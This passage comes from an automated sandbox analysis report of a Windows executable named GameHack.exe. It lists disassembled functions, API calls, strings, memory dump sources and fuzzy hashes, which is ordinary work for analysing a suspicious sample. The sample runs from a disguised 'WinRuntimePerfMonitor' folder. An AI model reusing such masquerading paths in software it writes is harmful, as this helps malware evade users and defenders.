                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 12577a9f6a54c63c071e0eb2309968233e9612d91d151b0eede4e9de50921ff9
                                      • Instruction ID: 764a6d37578b1fc06fccc9dc00334cc731b121702299c2198ba8310278e2e729
                                      • Opcode Fuzzy Hash: 12577a9f6a54c63c071e0eb2309968233e9612d91d151b0eede4e9de50921ff9
                                      • Instruction Fuzzy Hash: B941A132A003089BDB24DF78C881A6EB7E5EF89714F1555ADE655FB341EB31AD01CB80
                                      Function 00EFB610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 00EFB619
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EFB63C
                                        • Part of subcall function 00EF8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EFC13D,00000000,?,00EF67E2,?,00000008,?,00EF89AD,?,?,?), ref: 00EF854A
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00EFB662
                                      • _free.LIBCMT ref: 00EFB675
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EFB684
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: fffa6434c4c2146e4a4af60d82a5e018437730640fd91d5ecb75efa005ed2a00
                                      • Instruction ID: 014880758eeea2bff2f5756a7727fe6994ff4aeabe70a9e4c280dd1fde6bcd90
                                      • Opcode Fuzzy Hash: fffa6434c4c2146e4a4af60d82a5e018437730640fd91d5ecb75efa005ed2a00
                                      • Instruction Fuzzy Hash: DE01A77260161DBF63211A76AC8CC7F7A6DEEC7BA43661229FE05E7110DF60CD0191B0
                                      Function 00EF9029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,00F10EE8,00000200,00EF895F,00EF58FE,?,?,?,?,00EDD25E,?,00BB1600,00000063,00000004,00EDCFE0,?), ref: 00EF902E
                                      • _free.LIBCMT ref: 00EF9063
                                      • _free.LIBCMT ref: 00EF908A
                                      • SetLastError.KERNEL32(00000000,00F03958,00000050,00F10EE8), ref: 00EF9097
                                      • SetLastError.KERNEL32(00000000,00F03958,00000050,00F10EE8), ref: 00EF90A0
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 4a83088e52ee94598bbaae4d073f7cd4c42a5cdd3c87e6d0b32fbc85abbf88cf
                                      • Instruction ID: 7632dc5a0f22cd4c2c34f5eb16b806bfa41ec3ed68d3b9aa5bcc561f7f16f2ae
                                      • Opcode Fuzzy Hash: 4a83088e52ee94598bbaae4d073f7cd4c42a5cdd3c87e6d0b32fbc85abbf88cf
                                      • Instruction Fuzzy Hash: A701F472605A0C6BC32227356D85B7B369DBBC03797252024F759F2293EF60CC016161
                                      Function 00EE075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00EE0A41: ResetEvent.KERNEL32(?), ref: 00EE0A53
                                        • Part of subcall function 00EE0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00EE0A67
                                      • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00EE078F
                                      • CloseHandle.KERNEL32(?,?), ref: 00EE07A9
                                      • DeleteCriticalSection.KERNEL32(?), ref: 00EE07C2
                                      • CloseHandle.KERNEL32(?), ref: 00EE07CE
                                      • CloseHandle.KERNEL32(?), ref: 00EE07DA
                                        • Part of subcall function 00EE084E: WaitForSingleObject.KERNEL32(?,000000FF,00EE0A78,?), ref: 00EE0854
                                        • Part of subcall function 00EE084E: GetLastError.KERNEL32(?), ref: 00EE0860
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                      • String ID:
                                      • API String ID: 1868215902-0
                                      • Opcode ID: d7ed051b2930c3106b8bdeda7470e042179a4a42f79fdc23be70b9f8689c1d5b
                                      • Instruction ID: 8b30c453dba663b31d8a4def652d62cb52ae9fe21cb861946ebc56454faa47b5
                                      • Opcode Fuzzy Hash: d7ed051b2930c3106b8bdeda7470e042179a4a42f79fdc23be70b9f8689c1d5b
                                      • Instruction Fuzzy Hash: 1901B57144074CEFC7219B65DC84FC6BBEDFB48710F004529F15E52160CBB56A44DB90
                                      Function 00EFBF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00EFBF28
                                        • Part of subcall function 00EF84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958), ref: 00EF84F4
                                        • Part of subcall function 00EF84DE: GetLastError.KERNEL32(00F03958,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958,00F03958), ref: 00EF8506
                                      • _free.LIBCMT ref: 00EFBF3A
                                      • _free.LIBCMT ref: 00EFBF4C
                                      • _free.LIBCMT ref: 00EFBF5E
                                      • _free.LIBCMT ref: 00EFBF70
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 70fd4c65cfe1c8d2dfc0e4e2dad82261fe7cc6fa2004ac17541de5e8211e5017
                                      • Instruction ID: a3ffaeb78f61e003e51fc4ee066f7d1e681fe9d36376ade3a021cb268cd72b2e
                                      • Opcode Fuzzy Hash: 70fd4c65cfe1c8d2dfc0e4e2dad82261fe7cc6fa2004ac17541de5e8211e5017
                                      • Instruction Fuzzy Hash: 93F0FF3360520DA7CA20EF64EF86C2673D9FA007147646C09F619E7910CB20FC809A54
                                      Function 00EF8060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00EF807E
                                        • Part of subcall function 00EF84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958), ref: 00EF84F4
                                        • Part of subcall function 00EF84DE: GetLastError.KERNEL32(00F03958,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958,00F03958), ref: 00EF8506
                                      • _free.LIBCMT ref: 00EF8090
                                      • _free.LIBCMT ref: 00EF80A3
                                      • _free.LIBCMT ref: 00EF80B4
                                      • _free.LIBCMT ref: 00EF80C5
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: ad0fe8192ad4f4423600f48ebe3e5b18166a835b6ad611e07ed62b836fae99f5
                                      • Instruction ID: 5e90e392e5f8896d4988769143f9a8b61fa6efc08f0409c3ad3cf77a0dceb521
                                      • Opcode Fuzzy Hash: ad0fe8192ad4f4423600f48ebe3e5b18166a835b6ad611e07ed62b836fae99f5
                                      • Instruction Fuzzy Hash: 02F082B580212D8BC7116F15FE124263BA6F7147303086A1AF620A7A71CF314951BFD1
                                      Function 00EF76BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe,00000104), ref: 00EF76FD
                                      • _free.LIBCMT ref: 00EF77C8
                                      • _free.LIBCMT ref: 00EF77D2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
                                      • API String ID: 2506810119-1912035815
                                      • Opcode ID: 4d78e288285773aa9e3e68851efe4d10546161d35f89ff1f1dd64bd8a04e6e0c
                                      • Instruction ID: 3fad37b552df1a12ef3f2adbe8dd5bea6936aaf8fc5464bfc2fec2a3ecb3c6c2
                                      • Opcode Fuzzy Hash: 4d78e288285773aa9e3e68851efe4d10546161d35f89ff1f1dd64bd8a04e6e0c
                                      • Instruction Fuzzy Hash: 9531A071A1420CAFDB21EF99DD819BEBBFCEB84315F2450A7F648A7251D6704E40DBA0
                                      Function 00ED7574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED7579
                                        • Part of subcall function 00ED3B3D: __EH_prolog.LIBCMT ref: 00ED3B42
                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00ED7640
                                        • Part of subcall function 00ED7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00ED7C04
                                        • Part of subcall function 00ED7BF5: GetLastError.KERNEL32 ref: 00ED7C4A
                                        • Part of subcall function 00ED7BF5: CloseHandle.KERNEL32(?), ref: 00ED7C59
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                      • API String ID: 3813983858-639343689
                                      • Opcode ID: 66773ab7e5ec1d4fbd6ff28f7d6e12eb3756679d62972b8a84d52e9e2f3c326e
                                      • Instruction ID: 1f12186067fffa354bbedbd8dea9b4cd799af9edba91b57e714ec7e3c1cde176
                                      • Opcode Fuzzy Hash: 66773ab7e5ec1d4fbd6ff28f7d6e12eb3756679d62972b8a84d52e9e2f3c326e
                                      • Instruction Fuzzy Hash: F331B57190824CAEDF10EB65DC41BEEBBA9EF14354F005057F485B7392EBB08946D761
                                      Function 00EEA430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ED130B: GetDlgItem.USER32(00000000,00003021), ref: 00ED134F
                                        • Part of subcall function 00ED130B: SetWindowTextW.USER32(00000000,00F035B4), ref: 00ED1365
                                      • EndDialog.USER32(?,00000001), ref: 00EEA4B8
                                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00EEA4CD
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00EEA4E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: ASKNEXTVOL
                                      • API String ID: 445417207-3402441367
                                      • Opcode ID: a8c4a8a9697f768811270c55ed33703e74e93077001e68f8013c7edd3c3383d3
                                      • Instruction ID: 6e80503aece68837b347fc63563e6195ae560a54a9d11f8a584bba0e13c6af22
                                      • Opcode Fuzzy Hash: a8c4a8a9697f768811270c55ed33703e74e93077001e68f8013c7edd3c3383d3
                                      • Instruction Fuzzy Hash: 2111E932244298BFD7219F99DC4DF6637AAEB46354F18102AF611BB1E0C7A1A901E723
                                      Function 00EDD1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: __fprintf_l_strncpy
                                      • String ID: $%s$@%s
                                      • API String ID: 1857242416-834177443
                                      • Opcode ID: 95262ac65671c038a05b8e5707a8cfea335cfa44d8663fec6f70d07b0d1963d0
                                      • Instruction ID: 8d56311dacd278be949b0ec1c631ba1cb13900eb10bca23b98d0a94877e77d4c
                                      • Opcode Fuzzy Hash: 95262ac65671c038a05b8e5707a8cfea335cfa44d8663fec6f70d07b0d1963d0
                                      • Instruction Fuzzy Hash: 91216F3254424CAADF21DEA4CC46FEE7BECEF15300F041513FA15A62A1D371DA569B51
                                      Function 00EEA990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ED130B: GetDlgItem.USER32(00000000,00003021), ref: 00ED134F
                                        • Part of subcall function 00ED130B: SetWindowTextW.USER32(00000000,00F035B4), ref: 00ED1365
                                      • EndDialog.USER32(?,00000001), ref: 00EEA9DE
                                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00EEA9F6
                                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 00EEAA24
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: GETPASSWORD1
                                      • API String ID: 445417207-3292211884
                                      • Opcode ID: e566055b4191e76a70730869afe279315e2e87c0cad21606eba4d907e028946a
                                      • Instruction ID: 957d7e7b7cd3f74b83bc94922601475ef44666d60ca4544eb79eb5184bf0bb26
                                      • Opcode Fuzzy Hash: e566055b4191e76a70730869afe279315e2e87c0cad21606eba4d907e028946a
                                      • Instruction Fuzzy Hash: 2A116B3294025C7ADB219E65AD09FFB777DEB49310F040039FA49F3181C261AD55E672
                                      Function 00EDB4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      • _swprintf.LIBCMT ref: 00EDB51E
                                        • Part of subcall function 00ED400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED401D
                                      • _wcschr.LIBVCRUNTIME ref: 00EDB53C
                                      • _wcschr.LIBVCRUNTIME ref: 00EDB54C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                                      • String ID: %c:\
                                      • API String ID: 525462905-3142399695
                                      • Opcode ID: d2d045e0c7b2b5bb72ecd79da5b96c75214cc5bb022bd869e1ba81b616d57419
                                      • Instruction ID: b3ffd3cc496df1614a5c5ed32c5fcf9aaea17c85ee8c3cd6bc18dae8478c90d8
                                      • Opcode Fuzzy Hash: d2d045e0c7b2b5bb72ecd79da5b96c75214cc5bb022bd869e1ba81b616d57419
                                      • Instruction Fuzzy Hash: 6D014953904311FAC720ABB5AC42C7BB7EDEE953A07816417F945E6281FB30D851C2A1
                                      Function 00EE06BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00EDABC5,00000008,?,00000000,?,00EDCB88,?,00000000), ref: 00EE06F3
                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00EDABC5,00000008,?,00000000,?,00EDCB88,?,00000000), ref: 00EE06FD
                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00EDABC5,00000008,?,00000000,?,00EDCB88,?,00000000), ref: 00EE070D
                                      Strings
                                      • Thread pool initialization failed., xrefs: 00EE0725
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                      • String ID: Thread pool initialization failed.
                                      • API String ID: 3340455307-2182114853
                                      • Opcode ID: 27a0c6bb7d73e1880326fc04ef9a01199b069715c3ff0051dbe5769310d67de2
                                      • Instruction ID: 12ad1509fb253c2bdeb9313b87e1348672c1aaeb348ad034a428c06d7ab8b32a
                                      • Opcode Fuzzy Hash: 27a0c6bb7d73e1880326fc04ef9a01199b069715c3ff0051dbe5769310d67de2
                                      • Instruction Fuzzy Hash: 2011A0B1601709AFC3206F66C884AA7FBECFB94758F10482EF1DA92200D6B16A81DB50
                                      Function 00EED38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                      • API String ID: 0-56093855
                                      • Opcode ID: 2b894222f52f126952b433d4fb4b27ce44303aa73c6bdb00e0069b22e1198812
                                      • Instruction ID: 83f904aac9adf0fe58275291ee3c1036a23e7003789d90cfed8facede8cc6f04
                                      • Opcode Fuzzy Hash: 2b894222f52f126952b433d4fb4b27ce44303aa73c6bdb00e0069b22e1198812
                                      • Instruction Fuzzy Hash: 8901D4B160828EAFCB119F16EE44EDA7FA9E7143D4B018421F905E3271CB719C51FBA1
                                      Function 00EF91DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
